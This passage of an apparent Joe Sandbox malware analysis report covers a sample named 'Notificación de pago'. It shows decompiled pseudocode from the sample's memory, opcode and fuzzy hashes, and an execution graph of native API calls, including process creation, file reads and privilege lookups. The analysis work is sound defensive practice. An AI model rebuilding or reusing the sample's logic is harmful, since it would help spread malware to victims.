				 *((intOrPtr*)(_t55 + 0x20)) = 0;
				_t48 =  *((intOrPtr*)(_t31 + 0x3c));
				if( *((intOrPtr*)(_t31 + 0x3c)) == 0) {
					E0041BF00(_t55 + 0x24,  &_v24, E0041C1F0(_t55,  &_v24) + _t32 * 2);
					return 1;
				} else {
					_t36 =  *(_t31 + 0x38) & 0x0000ffff;
					_t52 = _t36;
					if(_t36 >= 0x206) {
						_t52 = 0x206;
					}
					_t22 = _t55 + 0x24; // 0x408f1b
					E0041BF00(_t22, _t48, _t52);
					 *((short*)(_t55 + 0x24 + (_t52 >> 1) * 2)) = 0;
					return 1;
				}
			}













                                              0x004072f7
                                              0x00407302
                                              0x00407309
                                              0x00407310
                                              0x00407317
                                              0x0040731e
                                              0x00407322
                                              0x00407327
                                              0x0040732c
                                              0x00407332
                                              0x00407338
                                              0x0040733b
                                              0x0040733e
                                              0x00407344
                                              0x0040734a
                                              0x00407350
                                              0x00407353
                                              0x00407356
                                              0x0040735e
                                              0x004073aa
                                              0x004073bb
                                              0x00407360
                                              0x00407360
                                              0x0040736a
                                              0x0040736f
                                              0x00407371
                                              0x00407371
                                              0x00407375
                                              0x00407379
                                              0x00407385
                                              0x00407394
                                              0x00407394

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MenuState
                                              • String ID: [$m$t$y
                                              • API String ID: 1976172297-3854059060
                                              • Opcode ID: c72bc8ba82aba81f23077ec36f683d7a5ac0d5dfccb06af5a573fe62a0b31416
                                              • Instruction ID: 24dbf0c1ececcff796b88f3f98cc6ccaece1d553e73979344f676e017cc54418
                                              • Opcode Fuzzy Hash: c72bc8ba82aba81f23077ec36f683d7a5ac0d5dfccb06af5a573fe62a0b31416
                                              • Instruction Fuzzy Hash: 3521F1B19007049FC724DF5AD8408ABB7F5EF88300F00866EE8499B361E7B5E941CBD4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004072E8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 58windowCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 84%
                                              			E004072E8(intOrPtr _a4, struct HMENU__* _a8) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				void* __esi;
				intOrPtr _t31;
				unsigned int _t36;
				unsigned int _t52;
				int _t55;
				struct HMENU__* _t56;

				asm("repe pop ebx");
				asm("sbb ch, [esp+edi*2]");
				asm("cmpsd");
				asm("rcr cl, 0x55");
				_t56 = _a8;
				_v24 = 0x53005b;
				_v20 = 0x730079;
				_v16 = 0x650074;
				_v12 = 0x5d006d;
				_v8 = 0;
				GetMenuState(_t56, 0x22c, _t55);
				_t31 = _a4;
				_t56->i = 0x22c;
				 *((intOrPtr*)(_t56 + 4)) = 0;
				 *((intOrPtr*)(_t56 + 8)) =  *((intOrPtr*)(_t31 + 0x44));
				 *((intOrPtr*)(_t56 + 0xc)) = 0;
				 *((intOrPtr*)(_t56 + 0x10)) = 0;
				 *((intOrPtr*)(_t56 + 0x14)) =  *((intOrPtr*)(_t31 + 4));
				 *((intOrPtr*)(_t56 + 0x18)) =  *((intOrPtr*)(_t31 + 0x48));
				 *((intOrPtr*)(_t56 + 0x1c)) =  *((intOrPtr*)(_t31 + 0x40));
				 *((intOrPtr*)(_t56 + 0x20)) = 0;
				_t48 =  *((intOrPtr*)(_t31 + 0x3c));
				if( *((intOrPtr*)(_t31 + 0x3c)) == 0) {
					E0041BF00(_t56 + 0x24,  &_v24, E0041C1F0(_t56,  &_v24) + _t32 * 2);
					return 1;
				} else {
					_t36 =  *(_t31 + 0x38) & 0x0000ffff;
					_t52 = _t36;
					if(_t36 >= 0x206) {
						_t52 = 0x206;
					}
					_t22 = _t56 + 0x24; // 0x408f1b
					E0041BF00(_t22, _t48, _t52);
					 *((short*)(_t56 + 0x24 + (_t52 >> 1) * 2)) = 0;
					return 1;
				}
			}














                                              0x004072e8
                                              0x004072ea
                                              0x004072ed
                                              0x004072ee
                                              0x004072f7
                                              0x00407302
                                              0x00407309
                                              0x00407310
                                              0x00407317
                                              0x0040731e
                                              0x00407322
                                              0x00407327
                                              0x0040732c
                                              0x00407332
                                              0x00407338
                                              0x0040733b
                                              0x0040733e
                                              0x00407344
                                              0x0040734a
                                              0x00407350
                                              0x00407353
                                              0x00407356
                                              0x0040735e
                                              0x004073aa
                                              0x004073bb
                                              0x00407360
                                              0x00407360
                                              0x0040736a
                                              0x0040736f
                                              0x00407371
                                              0x00407371
                                              0x00407375
                                              0x00407379
                                              0x00407385
                                              0x00407394
                                              0x00407394

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MenuState
                                              • String ID: [$m$t$y
                                              • API String ID: 1976172297-3854059060
                                              • Opcode ID: 13de45646ef89cb9105bad8a78ee1a4cc6d6b493be9d42d5f15e2e39cad6b40c
                                              • Instruction ID: 26ed326a5b3e1b1493ee5daa830cc76c90c3492fa04c7ec63bf5149aef31a4fa
                                              • Opcode Fuzzy Hash: 13de45646ef89cb9105bad8a78ee1a4cc6d6b493be9d42d5f15e2e39cad6b40c
                                              • Instruction Fuzzy Hash: B1119D70904B049FC724CF6AD44499BBBF6EF88300F10866EE8898B761E3B4E945CBC4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:5.1%
                                              Dynamic/Decrypted Code Coverage:2%
                                              Signature Coverage:0%
                                              Total number of Nodes:706
                                              Total number of Limit Nodes:87
                                              execution_graph 31664 a79030 31667 a7906b 31664->31667 31675 a7be60 31664->31675 31666 a7914c 31667->31666 31678 a6a130 31667->31678 31671 a790d0 Sleep 31672 a790bd 31671->31672 31672->31666 31672->31671 31687 a78c60 LdrLoadDll 31672->31687 31688 a78e60 LdrLoadDll 31672->31688 31689 a7a4f0 31675->31689 31677 a7be8d 31677->31667 31679 a6a154 31678->31679 31680 a6a15b 31679->31680 31681 a6a190 LdrLoadDll 31679->31681 31682 a75a90 31680->31682 31681->31680 31683 a75a9e 31682->31683 31684 a75aaa 31682->31684 31683->31684 31696 a75f10 LdrLoadDll 31683->31696 31684->31672 31686 a75bfc 31686->31672 31687->31672 31688->31672 31690 a7a50c NtAllocateVirtualMemory 31689->31690 31692 a7af60 31689->31692 31690->31677 31693 a7af6f 31692->31693 31695 a7afe5 31692->31695 31694 a75a90 LdrLoadDll 31693->31694 31693->31695 31694->31695 31695->31690 31696->31686 31699 3999540 LdrInitializeThunk 31701 a7f28d 31704 a7ba60 31701->31704 31705 a7ba86 31704->31705 31712 a69150 31705->31712 31707 a7ba92 31708 a7bab6 31707->31708 31720 a68440 31707->31720 31752 a7a660 31708->31752 31755 a690a0 31712->31755 31714 a6915d 31715 a69164 31714->31715 31767 a69040 31714->31767 31715->31707 31721 a68467 31720->31721 32168 a6a600 31721->32168 31723 a68479 32172 a6a350 31723->32172 31725 a68496 31732 a6849d 31725->31732 32225 a6a280 LdrLoadDll 31725->32225 31728 a68506 31729 a7c0b0 2 API calls 31728->31729 31749 a685e4 31728->31749 31730 a6851c 31729->31730 31731 a7c0b0 2 API calls 31730->31731 31733 a6852d 31731->31733 31732->31749 32176 a6d760 31732->32176 31734 a7c0b0 2 API calls 31733->31734 31735 a6853e 31734->31735 32188 a6b4c0 31735->32188 31737 a68551 31738 a75690 8 API calls 31737->31738 31739 a68562 31738->31739 31740 a75690 8 API calls 31739->31740 31741 a68573 31740->31741 31742 a68593 31741->31742 32200 a6c030 31741->32200 31743 a75690 8 API calls 31742->31743 31746 a685db 31742->31746 31750 a685aa 31743->31750 32206 a68220 31746->32206 31749->31708 31750->31746 32227 a6c0d0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31750->32227 31753 a7a67f 31752->31753 31754 a7af60 LdrLoadDll 31752->31754 31754->31753 31786 a78b80 31755->31786 31759 a690c6 31759->31714 31760 a690bc 31760->31759 31793 a7b310 31760->31793 31762 a69103 31762->31759 31804 a68ec0 31762->31804 31764 a69123 31810 a68920 LdrLoadDll 31764->31810 31766 a69135 31766->31714 32147 a7b600 31767->32147 31770 a7b600 LdrLoadDll 31771 a6906b 31770->31771 31772 a7b600 LdrLoadDll 31771->31772 31773 a69081 31772->31773 31774 a6d560 31773->31774 31775 a6d579 31774->31775 32151 a6a480 31775->32151 31777 a6d58c 32155 a7a190 31777->32155 31781 a6d5b2 31784 a6d5dd 31781->31784 32161 a7a210 31781->32161 31783 a7a440 2 API calls 31785 a69175 31783->31785 31784->31783 31785->31707 31787 a78b8f 31786->31787 31788 a75a90 LdrLoadDll 31787->31788 31789 a690b3 31788->31789 31790 a78a30 31789->31790 31811 a7a5b0 31790->31811 31794 a7b329 31793->31794 31814 a75690 31794->31814 31796 a7b341 31797 a7b34a 31796->31797 31853 a7b150 31796->31853 31797->31762 31799 a7b35e 31799->31797 31870 a79eb0 31799->31870 31807 a68eda 31804->31807 32124 a67210 31804->32124 31806 a68ee1 31806->31764 31807->31806 32137 a674d0 31807->32137 31810->31766 31812 a7af60 LdrLoadDll 31811->31812 31813 a78a45 31812->31813 31813->31760 31815 a759c5 31814->31815 31816 a756a4 31814->31816 31815->31796 31816->31815 31878 a79c00 31816->31878 31819 a757b3 31939 a7a410 LdrLoadDll 31819->31939 31820 a757d0 31881 a7a310 31820->31881 31823 a757bd 31823->31796 31824 a757f7 31825 a7bee0 2 API calls 31824->31825 31829 a75803 31825->31829 31826 a75989 31827 a7a440 2 API calls 31826->31827 31830 a75990 31827->31830 31828 a7599f 31948 a753d0 LdrLoadDll NtReadFile NtClose 31828->31948 31829->31823 31829->31826 31829->31828 31833 a75892 31829->31833 31830->31796 31832 a759b2 31832->31796 31834 a758f9 31833->31834 31836 a758a1 31833->31836 31834->31826 31835 a7590c 31834->31835 31941 a7a290 31835->31941 31838 a758a6 31836->31838 31839 a758ba 31836->31839 31940 a75290 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31838->31940 31840 a758d7 31839->31840 31841 a758bf 31839->31841 31840->31830 31897 a75050 31840->31897 31885 a75330 31841->31885 31846 a758b0 31846->31796 31847 a758cd 31847->31796 31849 a7596c 31945 a7a440 31849->31945 31850 a758ef 31850->31796 31852 a75978 31852->31796 31854 a7b16b 31853->31854 31855 a7b17d 31854->31855 31856 a7be60 2 API calls 31854->31856 31855->31799 31857 a7b19d 31856->31857 31968 a74cb0 31857->31968 31859 a7b1c0 31859->31855 31860 a74cb0 3 API calls 31859->31860 31863 a7b1e2 31860->31863 31862 a7b26a 31864 a7b27a 31862->31864 32095 a7aee0 LdrLoadDll 31862->32095 31863->31855 32000 a75fd0 31863->32000 32011 a7ad50 31864->32011 31867 a7b2a8 32090 a79e70 31867->32090 31871 a7af60 LdrLoadDll 31870->31871 31872 a79ecb 31871->31872 32118 399967a 31872->32118 31873 a79ee7 31875 a7bee0 31873->31875 32121 a7a620 31875->32121 31877 a7b3b9 31877->31762 31879 a7af60 LdrLoadDll 31878->31879 31880 a75784 31879->31880 31880->31819 31880->31820 31880->31823 31882 a7af60 LdrLoadDll 31881->31882 31883 a7a32c NtCreateFile 31882->31883 31883->31824 31886 a7534c 31885->31886 31887 a7536d 31886->31887 31888 a7a290 LdrLoadDll 31886->31888 31889 a75374 31887->31889 31890 a75388 31887->31890 31888->31887 31892 a7a440 2 API calls 31889->31892 31891 a7a440 2 API calls 31890->31891 31893 a75391 31891->31893 31894 a7537d 31892->31894 31949 a7c0f0 31893->31949 31894->31847 31896 a7539c 31896->31847 31898 a750ce 31897->31898 31899 a7509b 31897->31899 31900 a75219 31898->31900 31904 a750ea 31898->31904 31901 a7a290 LdrLoadDll 31899->31901 31902 a7a290 LdrLoadDll 31900->31902 31903 a750b6 31901->31903 31909 a75234 31902->31909 31905 a7a440 2 API calls 31903->31905 31906 a7a290 LdrLoadDll 31904->31906 31907 a750bf 31905->31907 31908 a75105 31906->31908 31907->31850 31911 a75121 31908->31911 31912 a7510c 31908->31912 31967 a7a2d0 LdrLoadDll 31909->31967 31915 a75126 31911->31915 31916 a7513c 31911->31916 31914 a7a440 2 API calls 31912->31914 31913 a7526e 31917 a7a440 2 API calls 31913->31917 31918 a75115 31914->31918 31919 a7a440 2 API calls 31915->31919 31924 a75141 31916->31924 31955 a7c0b0 31916->31955 31920 a75279 31917->31920 31918->31850 31921 a7512f 31919->31921 31920->31850 31921->31850 31932 a75153 31924->31932 31958 a7a3c0 31924->31958 31925 a751a7 31926 a751be 31925->31926 31966 a7a250 LdrLoadDll 31925->31966 31928 a751c5 31926->31928 31929 a751da 31926->31929 31931 a7a440 2 API calls 31928->31931 31930 a7a440 2 API calls 31929->31930 31933 a751e3 31930->31933 31931->31932 31932->31850 31934 a7520f 31933->31934 31961 a7bcb0 31933->31961 31934->31850 31936 a751fa 31937 a7bee0 2 API calls 31936->31937 31938 a75203 31937->31938 31938->31850 31939->31823 31940->31846 31942 a7af60 LdrLoadDll 31941->31942 31943 a75954 31941->31943 31942->31943 31944 a7a2d0 LdrLoadDll 31943->31944 31944->31849 31946 a7a45c NtClose 31945->31946 31947 a7af60 LdrLoadDll 31945->31947 31946->31852 31947->31946 31948->31832 31952 a7a5e0 31949->31952 31951 a7c10a 31951->31896 31953 a7af60 LdrLoadDll 31952->31953 31954 a7a5fc RtlAllocateHeap 31953->31954 31954->31951 31956 a7a5e0 2 API calls 31955->31956 31957 a7c0c8 31955->31957 31956->31957 31957->31924 31959 a7a3dc NtReadFile 31958->31959 31960 a7af60 LdrLoadDll 31958->31960 31959->31925 31960->31959 31962 a7bcd4 31961->31962 31963 a7bcbd 31961->31963 31962->31936 31963->31962 31964 a7c0b0 2 API calls 31963->31964 31965 a7bceb 31964->31965 31965->31936 31966->31926 31967->31913 31969 a74cc1 31968->31969 31970 a74cc9 31968->31970 31969->31859 31999 a74f9c 31970->31999 32096 a7d090 31970->32096 31972 a74d1d 31973 a7d090 2 API calls 31972->31973 31976 a74d28 31973->31976 31974 a74d76 31977 a7d090 2 API calls 31974->31977 31976->31974 31978 a7d1c0 3 API calls 31976->31978 32110 a7d130 LdrLoadDll RtlAllocateHeap RtlFreeHeap 31976->32110 31983 a74d8a 31977->31983 31978->31976 31979 a74de7 31980 a7d090 2 API calls 31979->31980 31981 a74dfd 31980->31981 31984 a74e3a 31981->31984 31986 a7d1c0 3 API calls 31981->31986 31983->31979 32101 a7d1c0 31983->32101 31985 a7d090 2 API calls 31984->31985 31987 a74e45 31985->31987 31986->31981 31988 a7d1c0 3 API calls 31987->31988 31995 a74e7f 31987->31995 31988->31987 31991 a7d0f0 2 API calls 31992 a74f7e 31991->31992 31993 a7d0f0 2 API calls 31992->31993 31994 a74f88 31993->31994 31996 a7d0f0 2 API calls 31994->31996 32107 a7d0f0 31995->32107 31997 a74f92 31996->31997 31998 a7d0f0 2 API calls 31997->31998 31998->31999 31999->31859 32001 a75fe1 32000->32001 32002 a75690 8 API calls 32001->32002 32004 a75ff7 32002->32004 32003 a76000 32003->31862 32004->32003 32005 a76037 32004->32005 32008 a76083 32004->32008 32006 a7bee0 2 API calls 32005->32006 32007 a76048 32006->32007 32007->31862 32009 a7bee0 2 API calls 32008->32009 32010 a76088 32009->32010 32010->31862 32012 a7ad64 32011->32012 32013 a7abe0 LdrLoadDll 32011->32013 32111 a7abe0 32012->32111 32013->32012 32015 a7ad6d 32016 a7abe0 LdrLoadDll 32015->32016 32017 a7ad76 32016->32017 32018 a7abe0 LdrLoadDll 32017->32018 32019 a7ad7f 32018->32019 32020 a7abe0 LdrLoadDll 32019->32020 32021 a7ad88 32020->32021 32022 a7abe0 LdrLoadDll 32021->32022 32023 a7ad91 32022->32023 32024 a7abe0 LdrLoadDll 32023->32024 32025 a7ad9d 32024->32025 32026 a7abe0 LdrLoadDll 32025->32026 32027 a7ada6 32026->32027 32028 a7abe0 LdrLoadDll 32027->32028 32029 a7adaf 32028->32029 32030 a7abe0 LdrLoadDll 32029->32030 32031 a7adb8 32030->32031 32032 a7abe0 LdrLoadDll 32031->32032 32033 a7adc1 32032->32033 32034 a7abe0 LdrLoadDll 32033->32034 32035 a7adca 32034->32035 32036 a7abe0 LdrLoadDll 32035->32036 32037 a7add6 32036->32037 32038 a7abe0 LdrLoadDll 32037->32038 32039 a7addf 32038->32039 32040 a7abe0 LdrLoadDll 32039->32040 32041 a7ade8 32040->32041 32042 a7abe0 LdrLoadDll 32041->32042 32043 a7adf1 32042->32043 32044 a7abe0 LdrLoadDll 32043->32044 32045 a7adfa 32044->32045 32046 a7abe0 LdrLoadDll 32045->32046 32047 a7ae03 32046->32047 32048 a7abe0 LdrLoadDll 32047->32048 32049 a7ae0f 32048->32049 32050 a7abe0 LdrLoadDll 32049->32050 32051 a7ae18 32050->32051 32052 a7abe0 LdrLoadDll 32051->32052 32053 a7ae21 32052->32053 32054 a7abe0 LdrLoadDll 32053->32054 32055 a7ae2a 32054->32055 32056 a7abe0 LdrLoadDll 32055->32056 32057 a7ae33 32056->32057 32058 a7abe0 LdrLoadDll 32057->32058 32059 a7ae3c 32058->32059 32060 a7abe0 LdrLoadDll 32059->32060 32061 a7ae48 32060->32061 32062 a7abe0 LdrLoadDll 32061->32062 32063 a7ae51 32062->32063 32064 a7abe0 LdrLoadDll 32063->32064 32065 a7ae5a 32064->32065 32066 a7abe0 LdrLoadDll 32065->32066 32067 a7ae63 32066->32067 32068 a7abe0 LdrLoadDll 32067->32068 32069 a7ae6c 32068->32069 32070 a7abe0 LdrLoadDll 32069->32070 32071 a7ae75 32070->32071 32072 a7abe0 LdrLoadDll 32071->32072 32073 a7ae81 32072->32073 32074 a7abe0 LdrLoadDll 32073->32074 32075 a7ae8a 32074->32075 32076 a7abe0 LdrLoadDll 32075->32076 32077 a7ae93 32076->32077 32078 a7abe0 LdrLoadDll 32077->32078 32079 a7ae9c 32078->32079 32080 a7abe0 LdrLoadDll 32079->32080 32081 a7aea5 32080->32081 32082 a7abe0 LdrLoadDll 32081->32082 32083 a7aeae 32082->32083 32084 a7abe0 LdrLoadDll 32083->32084 32085 a7aeba 32084->32085 32086 a7abe0 LdrLoadDll 32085->32086 32087 a7aec3 32086->32087 32088 a7abe0 LdrLoadDll 32087->32088 32089 a7aecc 32088->32089 32089->31867 32091 a7af60 LdrLoadDll 32090->32091 32092 a79e8c 32091->32092 32093 a79ea3 32092->32093 32117 3999860 LdrInitializeThunk 32092->32117 32093->31799 32095->31864 32097 a7d0a6 32096->32097 32098 a7d0a0 32096->32098 32099 a7c0b0 2 API calls 32097->32099 32098->31972 32100 a7d0cc 32099->32100 32100->31972 32102 a7d130 32101->32102 32103 a7d18d 32102->32103 32104 a7c0b0 2 API calls 32102->32104 32103->31983 32105 a7d16a 32104->32105 32106 a7bee0 2 API calls 32105->32106 32106->32103 32108 a74f74 32107->32108 32109 a7bee0 2 API calls 32107->32109 32108->31991 32109->32108 32110->31976 32112 a7abfb 32111->32112 32113 a75a90 LdrLoadDll 32112->32113 32114 a7ac1b 32113->32114 32115 a75a90 LdrLoadDll 32114->32115 32116 a7accf 32114->32116 32115->32116 32116->32015 32116->32116 32117->32093 32119 399968f LdrInitializeThunk 32118->32119 32120 3999681 32118->32120 32119->31873 32120->31873 32122 a7af60 LdrLoadDll 32121->32122 32123 a7a63c RtlFreeHeap 32122->32123 32123->31877 32125 a67220 32124->32125 32126 a6721b 32124->32126 32127 a7be60 2 API calls 32125->32127 32126->31807 32130 a67245 32127->32130 32128 a672a8 32128->31807 32129 a79e70 2 API calls 32129->32130 32130->32128 32130->32129 32131 a672ae 32130->32131 32135 a7be60 2 API calls 32130->32135 32140 a7a570 32130->32140 32133 a672d4 32131->32133 32134 a7a570 2 API calls 32131->32134 32133->31807 32136 a672c5 32134->32136 32135->32130 32136->31807 32138 a7a570 2 API calls 32137->32138 32139 a674ee 32138->32139 32139->31764 32141 a7a576 32140->32141 32142 a7af60 LdrLoadDll 32141->32142 32143 a7a58c 32142->32143 32146 39996e0 LdrInitializeThunk 32143->32146 32144 a7a5a3 32144->32130 32146->32144 32148 a7b623 32147->32148 32149 a6a130 LdrLoadDll 32148->32149 32150 a6905a 32149->32150 32150->31770 32152 a6a4a3 32151->32152 32154 a6a520 32152->32154 32166 a79c40 LdrLoadDll 32152->32166 32154->31777 32156 a7af60 LdrLoadDll 32155->32156 32157 a6d59b 32156->32157 32157->31785 32158 a7a780 32157->32158 32159 a7af60 LdrLoadDll 32158->32159 32160 a7a79f LookupPrivilegeValueW 32159->32160 32160->31781 32162 a7af60 LdrLoadDll 32161->32162 32163 a7a22c 32162->32163 32167 3999910 LdrInitializeThunk 32163->32167 32164 a7a24b 32164->31784 32166->32154 32167->32164 32169 a6a627 32168->32169 32170 a6a480 LdrLoadDll 32169->32170 32171 a6a656 32170->32171 32171->31723 32173 a6a374 32172->32173 32228 a79c40 LdrLoadDll 32173->32228 32175 a6a3ae 32175->31725 32177 a6d78c 32176->32177 32178 a6a600 LdrLoadDll 32177->32178 32179 a6d79e 32178->32179 32229 a6d670 32179->32229 32182 a6d7d1 32186 a7a440 2 API calls 32182->32186 32187 a6d7e2 32182->32187 32183 a6d7b9 32184 a7a440 2 API calls 32183->32184 32185 a6d7c4 32183->32185 32184->32185 32185->31728 32186->32187 32187->31728 32189 a6b4d6 32188->32189 32190 a6b4e0 32188->32190 32189->31737 32191 a6a480 LdrLoadDll 32190->32191 32192 a6b551 32191->32192 32193 a6a350 LdrLoadDll 32192->32193 32194 a6b565 32193->32194 32195 a6b588 32194->32195 32196 a6a480 LdrLoadDll 32194->32196 32195->31737 32197 a6b5a4 32196->32197 32198 a75690 8 API calls 32197->32198 32199 a6b5f9 32198->32199 32199->31737 32201 a6c056 32200->32201 32202 a6a480 LdrLoadDll 32201->32202 32203 a6c06a 32202->32203 32248 a6bd20 32203->32248 32205 a6858c 32226 a6b610 LdrLoadDll 32205->32226 32277 a6da20 32206->32277 32208 a68233 32220 a68431 32208->32220 32282 a74fe0 32208->32282 32210 a68292 32210->32220 32285 a67fd0 32210->32285 32213 a7d090 2 API calls 32214 a682d9 32213->32214 32215 a7d1c0 3 API calls 32214->32215 32217 a682ee 32215->32217 32216 a67210 4 API calls 32223 a68340 32216->32223 32217->32223 32344 a63660 10 API calls 32217->32344 32220->31749 32223->32216 32223->32220 32224 a674d0 2 API calls 32223->32224 32290 a6b1f0 32223->32290 32340 a6d9c0 32223->32340 32345 a6d4a0 21 API calls 32223->32345 32224->32223 32225->31732 32226->31742 32227->31746 32228->32175 32230 a6d740 32229->32230 32231 a6d68a 32229->32231 32230->32182 32230->32183 32232 a6a480 LdrLoadDll 32231->32232 32233 a6d6ac 32232->32233 32239 a79ef0 32233->32239 32235 a6d6ee 32242 a79f30 32235->32242 32238 a7a440 2 API calls 32238->32230 32240 a7af60 LdrLoadDll 32239->32240 32241 a79f0c 32239->32241 32240->32241 32241->32235 32243 a79f4c 32242->32243 32244 a7af60 LdrLoadDll 32242->32244 32247 3999fe0 LdrInitializeThunk 32243->32247 32244->32243 32245 a6d734 32245->32238 32247->32245 32249 a6bd37 32248->32249 32257 a6da60 32249->32257 32253 a6bdab 32254 a6bdb2 32253->32254 32268 a7a250 LdrLoadDll 32253->32268 32254->32205 32256 a6bdc5 32256->32205 32258 a6da85 32257->32258 32269 a67510 32258->32269 32260 a6bd7f 32265 a7a690 32260->32265 32261 a6daa9 32261->32260 32262 a75690 8 API calls 32261->32262 32264 a7bee0 2 API calls 32261->32264 32276 a6d8a0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 32261->32276 32262->32261 32264->32261 32266 a7af60 LdrLoadDll 32265->32266 32267 a7a6af CreateProcessInternalW 32266->32267 32267->32253 32268->32256 32270 a6760f 32269->32270 32271 a67525 32269->32271 32270->32261 32271->32270 32272 a75690 8 API calls 32271->32272 32274 a67592 32272->32274 32273 a675b9 32273->32261 32274->32273 32275 a7bee0 2 API calls 32274->32275 32275->32273 32276->32261 32278 a75a90 LdrLoadDll 32277->32278 32279 a6da3f 32278->32279 32280 a6da46 SetErrorMode 32279->32280 32281 a6da4d 32279->32281 32280->32281 32281->32208 32346 a6d7f0 32282->32346 32284 a75006 32284->32210 32286 a7be60 2 API calls 32285->32286 32289 a67ff5 32286->32289 32287 a68210 32287->32213 32289->32287 32365 a79830 32289->32365 32291 a6b20f 32290->32291 32292 a6b209 32290->32292 32423 a68c20 32291->32423 32414 a6d2b0 32292->32414 32295 a6b21c 32296 a6b4b2 32295->32296 32297 a7d1c0 3 API calls 32295->32297 32296->32223 32298 a6b238 32297->32298 32299 a6b24c 32298->32299 32300 a6d9c0 2 API calls 32298->32300 32432 a79cc0 32299->32432 32300->32299 32303 a6b380 32448 a6b190 LdrLoadDll LdrInitializeThunk 32303->32448 32304 a79eb0 2 API calls 32305 a6b2ca 32304->32305 32305->32303 32309 a6b2d6 32305->32309 32307 a6b39f 32308 a6b3a7 32307->32308 32449 a6b100 LdrLoadDll NtClose LdrInitializeThunk 32307->32449 32310 a7a440 2 API calls 32308->32310 32309->32296 32312 a6b329 32309->32312 32315 a79fc0 2 API calls 32309->32315 32313 a6b3b1 32310->32313 32316 a7a440 2 API calls 32312->32316 32313->32223 32314 a6b3c9 32314->32308 32317 a6b3d0 32314->32317 32315->32312 32318 a6b346 32316->32318 32319 a6b3e8 32317->32319 32450 a6b080 LdrLoadDll LdrInitializeThunk 32317->32450 32435 a792e0 32318->32435 32451 a79d40 LdrLoadDll 32319->32451 32323 a6b3fc 32452 a6af00 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32323->32452 32324 a6b35d 32324->32296 32438 a67680 32324->32438 32326 a6b420 32329 a6b46d 32326->32329 32453 a79d70 LdrLoadDll 32326->32453 32455 a79dd0 LdrLoadDll 32329->32455 32332 a6b43e 32332->32329 32454 a79e00 LdrLoadDll 32332->32454 32333 a6b47b 32334 a7a440 2 API calls 32333->32334 32335 a6b485 32334->32335 32336 a7a440 2 API calls 32335->32336 32338 a6b48f 32336->32338 32338->32296 32339 a67680 3 API calls 32338->32339 32339->32296 32341 a6d9d3 32340->32341 32529 a79e40 32341->32529 32344->32223 32345->32223 32347 a6d80d 32346->32347 32353 a79f70 32347->32353 32350 a6d855 32350->32284 32354 a79f8c 32353->32354 32355 a7af60 LdrLoadDll 32353->32355 32363 39999a0 LdrInitializeThunk 32354->32363 32355->32354 32356 a6d84e 32356->32350 32358 a79fc0 32356->32358 32359 a79fdc 32358->32359 32360 a7af60 LdrLoadDll 32358->32360 32364 3999780 LdrInitializeThunk 32359->32364 32360->32359 32361 a6d87e 32361->32284 32363->32356 32364->32361 32366 a7c0b0 2 API calls 32365->32366 32367 a79847 32366->32367 32386 a68760 32367->32386 32369 a79862 32370 a798a0 32369->32370 32371 a79889 32369->32371 32374 a7be60 2 API calls 32370->32374 32372 a7bee0 2 API calls 32371->32372 32373 a79896 32372->32373 32373->32287 32375 a798da 32374->32375 32376 a7be60 2 API calls 32375->32376 32377 a798f3 32376->32377 32383 a79b94 32377->32383 32392 a7bea0 LdrLoadDll 32377->32392 32379 a79b79 32380 a79b80 32379->32380 32379->32383 32381 a7bee0 2 API calls 32380->32381 32382 a79b8a 32381->32382 32382->32287 32384 a7bee0 2 API calls 32383->32384 32385 a79be9 32384->32385 32385->32287 32387 a68785 32386->32387 32388 a6a130 LdrLoadDll 32387->32388 32389 a687b8 32388->32389 32391 a687dd 32389->32391 32393 a6b930 32389->32393 32391->32369 32392->32379 32394 a6b95c 32393->32394 32395 a7a190 LdrLoadDll 32394->32395 32396 a6b975 32395->32396 32397 a6b97c 32396->32397 32404 a7a1d0 32396->32404 32397->32391 32401 a6b9b7 32402 a7a440 2 API calls 32401->32402 32403 a6b9da 32402->32403 32403->32391 32405 a7a1de 32404->32405 32406 a7af60 LdrLoadDll 32405->32406 32407 a7a1ec 32406->32407 32413 3999710 LdrInitializeThunk 32407->32413 32408 a6b99f 32408->32397 32410 a7a7c0 32408->32410 32411 a7a7df 32410->32411 32412 a7af60 LdrLoadDll 32410->32412 32411->32401 32412->32411 32413->32408 32415 a6d2c7 32414->32415 32456 a6c3a0 32414->32456 32422 a6d2e0 32415->32422 32469 a64000 32415->32469 32418 a7c0b0 2 API calls 32420 a6d2ee 32418->32420 32419 a6d2da 32496 a79160 32419->32496 32420->32291 32422->32418 32425 a68c3b 32423->32425 32424 a68d5b 32424->32295 32425->32424 32426 a6d670 3 API calls 32425->32426 32427 a68d3c 32426->32427 32428 a68d6a 32427->32428 32429 a68d51 32427->32429 32430 a7a440 2 API calls 32427->32430 32428->32295 32528 a66290 LdrLoadDll 32429->32528 32430->32429 32433 a6b2a0 32432->32433 32434 a7af60 LdrLoadDll 32432->32434 32433->32296 32433->32303 32433->32304 32434->32433 32436 a6d9c0 2 API calls 32435->32436 32437 a79312 32436->32437 32437->32324 32439 a67698 32438->32439 32440 a6a130 LdrLoadDll 32439->32440 32441 a676b3 32440->32441 32442 a75a90 LdrLoadDll 32441->32442 32443 a676c3 32442->32443 32444 a676cc PostThreadMessageW 32443->32444 32446 a676fd 32443->32446 32445 a676e0 32444->32445 32444->32446 32447 a676ea PostThreadMessageW 32445->32447 32446->32223 32447->32446 32448->32307 32449->32314 32450->32319 32451->32323 